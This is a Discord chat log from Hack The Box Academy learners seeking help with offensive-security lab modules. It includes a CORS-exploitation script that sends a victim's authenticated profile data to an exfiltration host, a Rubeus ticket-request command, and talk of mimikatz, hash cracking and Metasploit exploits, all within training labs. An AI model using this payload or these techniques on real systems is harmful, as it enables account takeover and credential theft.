#modules

can't js string follow the format string = 'string content'+variable ? why does it have to be string = 'string content'+variable+ '

Hello All can anyone help me for the last 2 questions in the below module : https://academy.hackthebox.com/module/112/section/1073

#modules message

I am working on the following exercise 'Parameter Logic Bugs -- > Code Review - Validation Logic Disparity':
Target(s): 94.237.60.154:51408
Try to locate both of the above functions, and then try to understand their main functionality, and see whether they are missing any validations that were performed on the front-end "thus leading to a logic disparity". Which of the two is more likely to be vulnerable? Use the function name as your answer.
I cannot select a date and view it source code, find whether they are missing any validations? Can someone help me with this?

@rustic sage don't spoil anything from AEN; my only hint is making sure everything is capitalized appropriately

c# is killing me help

it is only available for .net 4.0.0 which cannot be installed on new machines

Is someone available for my question?

ask the question

See #modules message

sorry mate, i haven't tackled that module yet

Which Module is this on?

The date is in the screenshots. It’s in the past

Check the year

@storm elk I check the year also

Cannot go to the past it has only year 2024

advanced deserialization

You may have to pull the references manually in the project tab (add references)

Haven't had any problems through the module

were you able to install .net 4.7.2

Just a bit of digging through C#, which is not my strong suit

Are you using your own VM or the Module's?

my own pc

Try the one from the Module

even that one has .net 6.0 only

https://www.reddit.com/r/VisualStudio/comments/utgvg6/cannot_use_net_472_with_visual_studio_2022/ i think i managed to install it now

I haven't installed anything with the Module's VM actually. Just had to reference some other assemblies manually

i downloaded it locally, i thought it would be a good learning experience to setup a exploit dev environment

How does one reset progress on the academy modules?

you cant

😔

Delete your account

It's a way 👀

Meaning I’ll lose my cubes , no thank you .😂😂😂😂

hello!

allow me to speakin the general

Jeez was this password "&aue%C)}6g-d{w" really necessary for a module that we get the RDP credentials anyway... 😄

Wassup hackers im an Aspriant

Can people Guide me on Ethical Hacking

Stuck at Oracle TNS.
So i connected to the database using user credentials, enumerated the server and I was supposed to query the server for name and password, where the name is 'DBSNMP'.
I have been querying tables left n right but no matches.
I don't have a way to escalate privileges and it seems unlikely for this module to do that.
Kindly help me as to what do i do to retrieve these records.

PS tried SQL queries with wildcards, didn't help

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Which database instance are you connecting to?

XE

that's the only one i found by bruteforcing

Try doing it again with odat tool

Is there a different instance i should look for ?

yes

Okay lemme give that a shot

Thanks, although I have already finished the question hahah 🙂

Is there anyone that can assist me on the takedown Sherlock? The last question on the TLSH it won’t accept the answer I found in VT

Feel free to dm me. I would greatly appreciate the help from someone

There wasn't another instance

But i got the answer tho

Yes, I found another XEXDB instance but the answer was inside XE, sorry!

Haha nvm.
M just glad I got it.
Thanks for the help as always

I did double check and it is possible to see that hint you added now

Wait.... the people who MADE these modules are on this SERVER ??

Yes, I think there are many people who have already completed the footprint module so I think most of them have their notes from all the labs so they can help you as well.

The devs themselves are here!! Wow

That's crazy

ugh enum4linux y u take so long

Can somebody from HTB check on the server for the Info Gathering - Web Edition Skills Assessment module? It's not working even after multiple resets. Can't even ping the server IP (and yes, I'm connected to the HTB vpn)

Saw a thread in here from 7/31 where @floral talon and another person were having the same issue despite doing everything right. I'm having the same issue unfortunately.

I added a line in my /etc/hosts file:
94.237.59.180 inlanefreight.htb

Yet I can't ping the IP, or open the URL in a browser with http://inlanefreight.htb:{PORT}

The other day I was able to brute force the subdomain for this module, but today I can't repeat what I did successfully.

My vpn stopped working randomly last week and no matter how many times I download a new ovpn file and switch vpn severs, it hasn’t started back working. Pwnbox saves the day

you get a port with the IP. Point your browser (and tools) to IP:PORT and it should work. Not sure why you can't ping it, I can ping the address I'm given

Yea I tried that too but no dice. I kept getting the same IP address each time I reset but with a different port and same results. Oddly enough it was the same exact IP I used 3 days ago for this module.

Just now I tried resetting over and over until I got a different IP on the same subnet and it's working now

advanced deserialization skills assessment is more like a reversing challenge lol

In the end is figuring which gadget chain you should invoke to gain command execution

i just got a random payload from ysoserial

check if there are any spaces at the front/back

glad to help 🙂

Anyone had issues with ADCS module, Certifried section, I cant modify the dNSHostName attribute of newly created machine account using bloodyAD or powerview.py

but it works when using certipy:

Do we have a channel for suggestions/feedback?

use /feedback

hey,This is the active directory introduction module, chapter AD Objects

im not sure of the correct regex to enter the answer,all variations of OU are not accepter

i got it

the multiple form of the word is needed

Hey

Can somrone help me with attackinge enterrize module lateral movement

I have managed to add ilfserveradmin to Administratos group using mimikatz

Now i need to read a flag in users administrator desktop but i cant seem to get into users administrator folder still now

Log out and back in

Also finish the module blind

Don't read or do the questions

Until after you get DC

has anyone done the fuzzing module?

is it good?

i am going to try it next to talk about with some of my friends who like that stuff but dont write/do htb modules.

It's alright

Teaches the basics of web fuzzing

oh i thought it used harnesses? and afl

Oh

was binary? i gotta look it was 500 cubes

You're talking about the bin fuzzing module

I've heard its decent

https://academy.hackthebox.com/module/details/258

Hello im facing an issue on ICMP Tunneling with SOCKS.

Here is the error message I get when running ptunnel-ng on the victim host :
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)

I tried to add the packages but didn't work...

You need to statically compile it before sending it over

by doing autogen.sh you mean ?

#modules message

Great it worked thank you !

Is it really viable the double pivots part using SocksOverRDP ?
It was lagging a lot ! I took 10 minutes just to read the flag.txt...
I don't even imagine if you have to do a new enumeration, run some tools and so on

Hi, I did the same thing but that didn't work. I changed VPNs and downloaded a new config file, but 172.16.8.0 just hangs, and then times out.

I got local admin on both 15 and 25 . On 25 i run mimikatz and found fileshare and Isharefiles2023! Creds. Now im stuck at this point i m unable to use this anywhere.... But on DC there is a shared folder with read and write permission on it

Hello

no

Bloodhound Module
Final SA Question: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

I must be missing something easy. Total number of users is:
||15 for inlanefreight.htb
13 for AZusers
So 28 total||
I then do the math based on users with a path to Global admin ||4 || and no dice.

Can I get a sanity check please? Thanks!

Edit: For anyone that finds this in the future, after pulling their hair out like I did 😃 :

1. The scope they are looking for is the total number of ||AZusers|| which can be found by looking at the ||database info|| tab in bloodhound.
2. The answer they are expecting isn't rounded up.
   Example: 14.258 is rounded up to 14.26 in excel. In this case, the answer they are expecting isn't rounded i.e. (14.25)

Hope this helps!

Use ligolo to do port forwarding and then ping it proxychains is a bummer most times

Ligolo isn't working for me either

Did anyone find the windows VM too slow in the section Thick Client Applications of the Attacking Common Applications module? I've been stuck on it for weeks and can't move past it. If it's allowed can someone DM me the answer so I can finish the module?

Can't give you the answer, but we can show the proper steps to get to the answer

Well.. don't just show the steps.. try to guide them to discover the steps

If you wanna help someone, showing them the path with a map just gets them to the end. Guiding them via encouraging them ask the right questions themselves in order to come to the answers, that's the ticket.

Anyone have time for a video chat that completed Attacking Enterprise Networks? Especially Exploitation $ Privilege Escalation? I've hit a wall, and I cannot for the life figure this one out.

have you checked the module? it takes you through step-by-step on how to do it

Hey, can someone help me real quick? I just downloaded Kali linux and the codes on the terminal dont get highlighted when I type them its just plain white

How do I fix that?

did you install the gui version? sounds like maybe you used bash instead of zsh

Hey guys not sure if this is the right channel for this, but ive been working on this for two days now and i cant find the answer to this question, any advice? This is the AD Enum and Attack path in the ACL Enum Module
Question:
What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
Ive found that ||The user forend has the AddSelf and Generic Write|| rights over the GPO group, but putting it in the format ||Add-Self and Generic-Write|| doesnt give the answer, im pretty confused.

Anyone having problem spawning target ?

What did you use to get this information?

Couple ways, inside the module they recommend turning the username into security principle and then using that in combination with PowerView to grab what ACLs we may have (Commands below), Then I grabbed all the info via sharphound and plopped it into bloodhound and took a look since that was another method they recommended to see what ACLs we may have.
Commands
||PS C:\Tools> $forendid = Convert-NameToSid forend ||
||PS C:\Tools> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $forendid} -Verbose ||

Hey having issues with Getting Started module I'm connecting to the VPN but when I ping the target I get nothing...

I remember having issues too and the only thing that fixed it on my end was switching to an EU VPN.

Interesting 🤔

Run man netcat and look at the command format

You can DM if you want.

Still nothing

Is the IP you're trying to ping 83.136.252.99? If so, this isn't a VPN issue as that is a public IP and doesn't require a VPN connection to connect to.

Oh... huh

Ok so I disconnected my vpn and it's still nothing

Ok..

Remove :39160

That is the port number

Ping is attempting to resolve what you provided as a domain name, as it does not fit the format of an IP address

and it works now lol

Whenever you see an IP with a : in, you're getting both the IP and the port number

ah whoops lol

Hello guys. Can you please confirm if this is a lie:

To extract sensitive information like cookies, local storage, or session storage data from http://10.129.28.25/phishing/, you need JavaScript executed within the context of that origin.

This means that you CANNOT send a malicious payload to the target which goes to the site that you want their cookies from and then send their cookies to your server?

Is this true ?

it can be

i think it depends on the CORS policy, but i could be very wrong i'm weak with web stuff

yeah it's a heavy it depends

Oh Okay. I am noticing much more as I am doing a deep dive into the vulnerabilities and attacks that Chat GPT does not know everything

ChatGPT isn't a knowledge repository

Today alone it didn't know 2-3 things and it gave me code that was less efficient that a module

it can be used to help explain something

Module: Windows Attack and Defense
Section: Print Spooler & NTLM Relaying
Issue: When I setup the ntlmrelayx on 1 terminal and setting up another terminal for dementor, I'm running into issues on terminal 1 with a bunch of errors once I've executed dementor. Anyone else run into that issue?

Rem, have you tried not having skill issues? (i haven't done that one)

Well, it depends.. "within the context of that origin" is the key term here.

There are other ways of sending requests to a host bypassing CORS and CSP, but that statement above suggests you would have a way to execute javascript within the context of the origin.

So I have another problem... it involves gobuster

If this is in a module, perhaps re-read the previous sections of the module. You may have missed something

Your machine seems to have issues connecting to the web. Can you open a browser and reach Google or some other website?

Which is werid cause I've used gobuster before

oh actually you got a 404 so it's connected

yee

kali has gobuster preinstalled i thought? or maybe only mine cuz i downloaded the 'everything' version..

you can get it from here https://github.com/OJ/gobuster/releases/tag/v3.6.0

Ik I'm probs dumb how do I download it from the zip (I've done it before from my laptop when I had arch but it's been a bit)

you download it and unzip it

ahh

Thats weird cause u can send victims to different parts of the website for example to change their user info and then get info response through the page that they get -- but meanwhile u cant get the response cookies and stuff ?

Maybe u can explain this

ADCS Attacks > Skills Assessment

I am stuck at the last question. I have got the jimmy user and found the vulnerability but I can not exploit it. Can anyone give a nudge. (DM is fine)

Again, which module / section? I can't provide direct advice I'm afraid, but feels like you may have missed something in the sections leading up to this.

If the exploit doesn't work, perhaps that's not the vulnerability..

did you even check the section

https://academy.hackthebox.com/achievement/badge/bdb4cec4-d889-11ee-891c-bea50ffe6cb4

nah you don't know

I did, but if you found the correct vulnerablity you should be able to exploit it, since you said you can't, you probably didn't find the right one. it's tricky.

unzipped it how do I run the .exe

my brain is stinky

you aren't going to run an .exe file in linux, that's for windows. you need to download the linux binary

then chmod +x it

gobuster wasn't preinstalled in kali for you? did you get some bare bones version? i always get the full version and it comes preinstalled for me, but i would imagine gobuster comes with the smaller versions

idk what happened to it

I'm just gonna make another vm fresh

wow, didnt get part with script
can i dm for that?

ok got gobuster running and also for some reason it just won't install on the other vm but will with this one HahAHa

ok now how do I get wordlists?!

comes with kali to.. locate -i rockyou or seclists, or whatever you're trying to find. otherwise google seclists/rockyou/whatever wordlist

Guess my version doesn't have seclists I'm just gonna download it idk why Kali hates me today

apt install seclists

already on it lol

you must be downloading some barebones kali version

get the 'everything' version

I mean I got it off the official website via an image file

ok got it to were it needs to go...now

AHHH IT WORKS FINALLY!!!

some reason it is now working. nvm

and now I can't get the website when I type it in...🫠

well, the pwnbox is always available

I'll try it

in the browser it can't reach the website...

it probably despawned or wrong port

ok running gobuster then trying again

got a 404 error

oh wait..

404 means not found, so you connected to the server

check the url

welp I figured it out

The /47/ seems a bit odd imo

that was the issue... I read it wrong

It happens 😄 you’re all set now

Sorry if I'm a goober

You’re not and no need to be sorry

I have a query regarding Intro to Network Traffic Analysis module Tcpdump Fundamentals section question # 4.

Why is sudo even required when we are just reading from a file? It does not feel intuitive to me, had to lookup the answer after several failed attempt.

Hi guys, I have a question, which system is the best? Windows 11 pro or kali linux? What do you think? I bought a new laptop and I am undecided which one I should prefer.

win 11 with a vm running kali

Win 11 with wsl 2 kali

So is gobuster suppost to go slow with dns search?

Do you guys recommend using msf bounce shell or just nc bounce shell?

I (for the life of me) CANNOT get ReconSpider to work on the skills assessment of the Information Gathering - Web Edition module. Losing my mind

wdym "can't get it to work"

like that's a super vague thing

Yea go ahead.

oops that screenshot technically spoils

hi all, I need some clarification. The module is Password Attacks, I'm in the Windows Pass the Ticket section (https://academy.hackthebox.com/module/147/section/1639). The Mimikatz command for "Pass the Key or Overpass the Hash" is exactly the same as the one demonstrated in the previous section for a simple "Pass the Hash". I'm trying to understand what the difference is, is it the context? Kerberos vs "simple" NTLM in each case respectively?

PS: reading ahead and checking the recommended reading of https://github.com/GhostPack/Rubeus#example-over-pass-the-hash makes me more confused - it seems like the method presented for Mimikatz PtH (sekurlsa::pth) is actually an Overpass...

ok, if I understand correctly,

• mimikatz' sekurlsa::pth is effectively an Overpass;
• in the process, it "injects" the NTLM hash into your session;
• for NTLM-based authentication scenarios, this will be sufficient, and we've effectively performed PtH;
• for kerberos, it will then use the NTLM hash to get a ticket and Overpass the Hash.

please let me know if I got any of that wrong, or even just mildly incorrect

what's the difference between parrot security & parrot htb edition (?)

just the HTB theme on the latter (cosmetics)

Does anyone else has his support box gone?

what'll be the benefits?

no other difference, are you sure?

Wrong channel

Yes

What is the right channel?

#1024429874246590575 ; also id turn off any adblockers

yea it solved the problem.. it just always it was fine so far. tnx.

xrdp , remmina aree not working while trying to rdp into a windpws session from my virtualbox even when using openvpn while it flawlessly works in pwn isntance but it gets super slow and annoying in pwn instance , is there any alternative ???

Hi guys, I'm currently stuck on Suricata Rule Development Part 2 (Encrypted Traffic) | Working with IDS/IPS, on this question: "There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer." Any help would be great .

Hi everyone, I need some help with HackTheBox. I am trying to do the linux fundamentals module and now i am at the system information part, where I need to ssh an VM. I have an virtual machine of Ubuntu where I am trying it, but it just says: ssh: connect to host 10.129.174.64 port 22: Connection refused

I'm having issues in connecting with Openvpn of meow machine in htb. It's just showing 'Creating Instance' & then doesn't show up anything

Maybe this will help? First check openssh-server installed in that system.

check the status of ssh service, make ssh service start.

sudo service ssh status
sudo service ssh start
Check whether port 22 in that system is blocked by iptables. Just allow port in iptables and then check.

sudo iptables -A INPUT -p tcp --dport ssh -j ACCEPT
Else change port number of ssh from 22 to 2222 by editing

vi /etc/ssh/sshd_config
/etc/init.d/ssh restart.

#starting-point : read and follow #welcome

In the target system or in my own system

Yours

Ngl he gave you a lot of extra legwork

Are you connected to the vpn?

Hey all, I'm on the Getting Started module - Knowledge Check section. I've been able to get my foothold both manually and via metasploit. I've also rooted the box using sudo -l - GTFObins method. I'm trying to find the second privilege escalation method.

What I've tried:
I've run linpeas and linenum and nothing is screaming at me.
Attempted to view bash history of the user. Permission Denied.

Attempted to view successful sudo of user. Permission denied.

Attempted sudo exploit against a known vulnerable version. Says it's not vulnerable.

I've run dpkg -l, not positive how to approach pinpointing vulnerable software. If it is here let me know how I can work through finding it.

Also tried to see if I could loot the id_rsa key with no luck.

Anyone have any hints?

still in the Windows Pass the Ticket section of Password Attacks (https://academy.hackthebox.com/module/147/section/1639). I've answered the last question with Mimikatz, but Rubeus is failing to ptt:

C:\tools>Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:<prettysureit'stherighthash-butI'vetriedthemallIthink> /ptt

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: <thehash>
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\john'
[*] Using domain controller: 172.16.1.10:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:

C:\tools>

Any clue?

I'm still googling it but not having much luck, will try a reset if you can't think of anything

Attacking common applications
Coldfusion enum
I nmaped port 5500 and submitted the protocol under the service column but it seems wrong

Any clue? Some help please... have been tryingn to ennumerate really really hard

Make sure there's no spaces etc

@faint geode could i dm in regards to this?

Sure, but I'm at work so will be slow to respond

using the .kirbi file works, but the above still doesn't, also after a reset. Would like to understand why before moving on, any help ?

Hi 🙂
I have a same problem.
I'm connected to vpn on my virtual machine and when I want to connect to ssh I'm getting same error port 22: Connection refused
I followed all of your instructions but still same error.
One thing even after changing ssh port to 2222 it still saying port 22: Connection refused

are you using a password or key to log in ? Also is your VPN up ?

can you provide the full command you are using

I believe if you use -p it will use the right port

I'm currently connected to vpn
for ssh im using same command as in the guide which is "ssh kali@IP of target machine"

Just tried -p 2222 and got error "port 2222: connection refused"

Try resetting the target

👆🏻

-S sudo service ssh status
• ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/usr/lib/systemd/system/ssh.service; disabled; preset: disabled)
Active: active (running) since Tue 2024-11-12 13:23:02 GMT; 35min ago
Invocation: a509202877fc4d96961d9391157df943
Docs: man: sshd(8)
man: sshd_config(5)
Process: 8028 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
Main PID: 8032 (sshd)
Tasks: 1 (limit: 2203)
Memory: 316K (peak: 1.7M swap: 1.1M swap peak: 1.1M)
CPU: 14ms
CGroup: /system.slice/ssh.service
-8032 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
Nov 12 13:23:02 vbox systemd[1]: Starting ssh.service - OpenBSD Secure Shell server...
Nov 12 13:23:02 vbox sshd[8032]: Server listening on 0.0.0.0 port 2222.
Nov 12 13:23:02 vbox systemd[1]: Started ssh.service - OpenBSD Secure Shell server.
Nov 12 13:23:02 vbox sshd[8032]: Server listening on :: port 2222.
•(matias@ vbox)-[~/Downloads]
•$ ssh -p 2222 kali@10.129.239.128
ssh: connect to host 10.129.239.128 port 2222: Connection refused

can you ping the target ?

yes ping is working on the target IP

its the same on both virtual machines - kali and parrot linux have same error

ssh -p 22 kali@10.129.239.128 ?

Also i don't think kali is a user on the target

Htb-student usually

your ssh server is listening on port 2222 wich is unusual but wathever is should not be a problem when you try to reach another host

yes i never heard about a kali username inside HTB

Im following guide from this module https://academy.hackthebox.com/module/176/section/1754

and the command used is ssh kali@IP

hum i don t think it s a lab ... that maybe just an example

bump, any clue ?

the fact you are able to ping the 'target' is maybe just a coincidence ?

wrong channel buddy try contacting the official support

can you give me the channel?

no channel, just contact the support (on the academy website)

I don't know i'm getting really confused now. They don't specify other user name for ssh connection apart from (kali/kali)

if you currently are on the exact section you sent, then there is no practice to do maybe retry after spawning the target in skills assessment ?

this page is only for the instructions and im trying to do questions from next page (https://academy.hackthebox.com/module/176/section/1778)

Ah yeah I heard that module uses a kali box

And that it's a PITA

I have no problem doing the remote desktop for windows machine but ssh to kali is like I have shown 😦

I will try using pwnbox but it was always very laggy for me

Same thing on Pwnbox 😦

Hi guys, can anyone help me with this question in "Tcpdump fundamentals" https://academy.hackthebox.com/module/81/section/774 please? In the 4th question one shall name the command for printing the packets from a file in hex and ascii. AFAIK and the man pages, with the given file the solution should be "tcpdump -Xr /tmp/capture.pcap", but this answer is rejected, regardless whether or not providing "tcpdump" as "/usr/bin/tcpdump" or omitting it completely, regardless how to order the switches. Which is the requested answer?

ok, moved on but then figured it out while going through my notes. I was using a key from sekurlsa::tickets, when I should use the output of sekurlsa::ekeys

Maybe add sudo?

Hi everyone,

I'm feeling a bit stuck and disheartened trying to figure out the expected format for the first question in the "Skills Assessment" of the "Stack-Based Buffer Overflows on Linux x86" module.

The question asks: "Determine the file type of 'leave_msg' binary and submit it as the answer."

I've used both the file shell command and the info file command in GDB to gather information. However, the exact and complete output of the file command does not fit in the answer field. I've tried several variations of what I believe to be the important bits of information (e.g., Linux ELF 32-bit i386), but none have been accepted.

Could anyone clarify:

1. Is there a specific format expected for the answer?
2. Do I need any additional tools or steps beyond file and info file to determine the file type?
   I'd really appreciate any guidance or suggestions! Thanks in advance. 😊

I also just checked if I could write my key to the authorized_keys folders. Permission denied.

Can someone help me with the CORS Misconfiguration exercise in the Advanced XSS and CSRF Exploitation Module?

I have found the vulnerability that it is reflecting the Origin but I can't seem to find a way to exploit it.

<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb/profile.php', true);
xhr.withCredentials = true;
xhr.onload = () => {
location = 'https://exfiltrate.htb:42219/log?data=' + btoa(xhr.response);
};
xhr.send();
</script>

it's part of the Windows Attacks & Defense module

Remove the port

Take another look at the section. Particularly the end of the section. Additionally, it is generally good practice to test the payload out yourself before submitting it to the victim. If you try to get your payload to work, your browser will tell you why it isn't working. You don't have to remove the port from the payload, if you get a payload to work on your own session, you can submit it as is and it'll work on the victim as well 🙂

Hi,
I am new around here and I try to finish the last bash script from https://academy.hackthebox.com/module/21/section/128

but I can't validate the answer: 25223. Is wrong?

#!/bin/bash

# Decrypt function
function decrypt {
    MzSaas7k=$(echo $hash | sed 's/988sn1/83unasa/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4d298d/9999/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/3i8dqos82/873h4d/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4n9Ls/20X/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/912oijs01/i7gg/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/k32jx0aa/n391s/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/nI72n/YzF1/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/82ns71n/2d49/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/JGcms1a/zIm12/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/MS9/4SIs/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/Ymxj00Ims/Uso18/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/sSi8Lm/Mit/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/9su2n/43n92ka/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/ggf3iunds/dn3i8/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/uBz/TT0K/g')

    flag=$(echo $MzSaas7k | base64 -d | openssl enc -aes-128-cbc -a -d -salt -pass pass:$salt)
}


var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"

# Base64 Encoding Loop
for i in {1..28}
do
    var=$(echo -n "$var" | base64)
done

# Assign salt as the length of the 28th hash
salt=${#var}

echo $salt
# Check if $salt is not empty and run decrypt
if [[ ! -z "$salt" ]]
then
    decrypt
    echo $flag
else
    exit 1
fi

Thanks for the help guys, I'll have another look

Is the idea to get a session cookie or is there away to make it work as soon as the victim clicks

a

Linux Privilege escalation, Kernel Exploits. When I try to run any of the exploits I find I have :
bash: ./exploit.sh: /bin/sh^M: bad interpreter: No such file or directory
I am not sure what's the problem, do I need to compile .sh file like .c? Or just chmod +x is enough?

hi guys on the password attack module for "Attacking LSASS", how do we transfer the lsass.dmp file to our own machine?

it told us in the previous module (attacking SAM) but it didnt make sense to me for how we could do it for lsass because that was for SAM

Hey im running inveigh to cature hases in enterprize module lateral movement and its been some time i havent got any hash anyone knows anythinh

exactly the same method, doesn't matter what kind of files you're transferring

?mm

That has you using RDP to access the target, so the easiest way is to just use /drive with your xfreerdp command. Just drag and drop or copy/paste, etc.

someone has apache/2.4.6 backdoor?

security test

for the shadow file section under the linux chapter of password attacks module, I'm having trouble with the last step.

I am trying to unshadow the shadow file. I tried doing it via ssh on target machine it wouldn't work because I didn't have permission to install john the ripper. I then FTP downloaded the unshadowed hashes. hashcat isn't working on the unshadowed hashes tho. Here's my latest terminal output on the pwnbox after using FTP get request to download unshadowed hashes from the target successfully:

┌─[us-academy-1]─[10.10.15.20]─[htb-ac-605555@htb-ogdmpk3m8h]─[/usr/share]
└──╼ [★]$ hashcat -m 1800 -a 0 /tmp/unshadowed.hashes /usr/share/wordlists/rockyou.txt -o /tmp/unshadowed.cracked
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 7543 32-Core Processor, 3919/7902 MB (987 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile '/tmp/unshadowed.hashes' on line 1 (Please ask your administrator.): Separator unmatched
No hashes loaded.

Started: Tue Nov 12 15:00:23 2024
Stopped: Tue Nov 12 15:00:23 2024

what's with that part about "Please ask your administrator?"

can someone hint me in the right direction here?

also what's with no hashes loaded

RDP, SMB, base64

I'd check the content of that file, my guess is it's not what you expect

did you read the file transfer module ? generally you are just transfering file doesn't really matter if it is SAM or lsass

I did it gave a Please Ask Your Administrator Error

That module was nice!

wait, that's the contents of the file?

yep 🙂

but shouldn't be

then where are the hashes?

yeah and skills a learned from it was very useful

my guess is whatever you used to generate unshadowed.hashes failed, giving that as output. Just transfer both /etc/passwd and /etc/shadow to your machine, and unshadow there

It was
There are times when I can’t get a connection from the host to a server I control, I always go to converting stuff to b64 then reverting back

I tried but I don't have permission to transfer to my machine

unless I transfer to the tmp folder but then I look and the files aren't there

slow down a bit. You can ssh into the machine, and you can read the files, correct ?

yes

oh I see so I can just copy-pasta

that's always an option, yes. But you can also scp

(among many other options, see the File Transfers module, but that's the most obvious one)

ok now hashcat is cracking password but is it really gonna take seven hours?

exploit/linux/http/apache_solr_backup_restore

exploit/multi/misc/apache_activemq_rce_cve_2023_46604

I'm gonna have the pwnbox running for a while

Estimated time is just to run through the whole list

ok

It generally takes way less time

ok thanks

Also pwnbox lifetime can't be extended past 6 hours

ok ya makes sense so would be kind of pointless if it took that long

but I think that I will take a break then while its cracking this

I will need to get some food for sure

am I on the right track if I got hashcat working at least?

like am I doing the right thing?

It takes ~30 at most in many situations

ok thanks

IRL too or mainly on Hack the Box?

or generally?

SQL Injection module. Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database?

──(kali㉿kali)-[~]
└─$ mysql -u root -h 94.237.50.65 -P 39892 -ppassword
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

In htb

Ok what about IRL?

I’m just curious

Skipping ssl might work with --skip-ssl flag.

Thanks!

https://tenor.com/view/it-depends-on-the-situation-alex-engvid-depending-on-the-situation-it-depends-on-the-circumstances-gif-27205658

ok so its 8% of the way through and hashcat hasn't found it yet

should I give it 20 more minutes?

is the guess queue the queue that determines if all passwords have been cracked? I don't mean to ask something stupid

it also says recovered 0/4

0/4 means of the 4 hashes, none are cracked

ok

it was running for 38 minutes

it didn't crack any of them

Then perhaps, wrong list

ok

ya I will try again later

maybe the list in resources is more practical

will try that one soon

wait hold on

I'm trying list in resources to see if it will work better

nope went through whole list didn't work

what is the right wordlist?

hold on

I think what I have to do is mutate the wordlist in the resources

how do I do that?

ok I think I am gonna solve it

I mutated the password list so now I think its a matter of waiting

I think I actually am gonna have mostly solved this on my own

Is it just me or does x64dbg always take FOREVER to open? Because now that I'm onto the Thick Client section of Attacking Common Applications, if I double click the x64dbg icon on the Remote Desktop, nothing happens for like a minute and a half.

solved

I actually finished it on my own. I feel really good about myself.

gonna try doing the next section on my own

Adding to this that the hints in the module text mention the fact that one is supposed to look for memory of type "MAP" with size 0x3000 — which is nowhere to be found anywhere in the memory map. Why is this? ATTN: @gray yacht

Am I supposed to look in ntdll.dll for this runas knockoff? Because the actual memory layout looks nothing like the module screenshots either.

Did you set the breakpoint properly

If you mean "check Exit Breakpoint and uncheck everything else" then yes.

Why therefore is the layout of the file so different from the module?

The exit breakpoint is taking me to ntdll.dll. Why?

@compact matrix you dont need the <>

just realised :/

remove the spaces too

just in case

ah yes worked without the spaces

thats gonna take some time

I dont think im doing this right

you're getting errors tho

i already got the subdomains I dont need to fuzz them from the word list

dm me the command with the wordlists

yeah, just use the ones you found alredy

Hey guys, I'm in Attacking Enterprise Networks - Exploitation & Privilege Escalation. Has anyone experienced the web page in the exercise continuously time out? I logged in with the Admin credentials, and as I was navigating through the exercise, the web page timed out on me three times.

Did anyone else go through this? How did you fix it? I don't want to keep starting over and over.

Hello can anyone familiar with JWT tokens please come to the VC?

https://discord.com/channels/473760315293696010/563376155592359976

Nvm I figured it out

Never mind, realized that I missed a step

Hi there, I am in Broken Authentication module. In that module, in Brute-Forcing Password Reset Tokens, how can I take over another user's account which is in the last question?

hello , anyone have any tips on how to RDP? I keep getting a login failure and I am using this command: xfreerdp /v:<target ip> /u:htb-student

add a password? /p:<password>

having trouble with this question as well if anyone has any advice: Section: Windows Privilege Escalation > User Account Control

Q: Follow the steps in this section to obtain a reverse shell connection with normal user privileges and another which bypasses UAC. Submit the contents of flag.txt on the sarah user's Desktop when finished.

What are you struggling with?

not understanding how to preform an RDP - am i missing the /p:<password> in the command?

try it and see if it works

hard to say why you can't without the error

Try to do it with Remmina

Hey there is an error in the "Intro to binary fuzzing module" on the LibFuzzer section. Its right after the big screenshot at the the top, starting at "This function (LLVMFuzzerTestOneInput)" and continues for a few paragraphs. This info appears to be presented earlier than intended as the code box for that function is way lower on the page

MODULE: Skill Assessment SQL fundamental lab

i have got web shell through mysql on the target, but i do not know how to get flag which is at /root

I have check NIC but they all are LAN IPs

Where the hell is the flag in "whitebox attacks advanced exploitation"?

can anyone look at the machine in Supply chain module (https://academy.hackthebox.com/module/243/section/2681), I am not able to RDP into it.

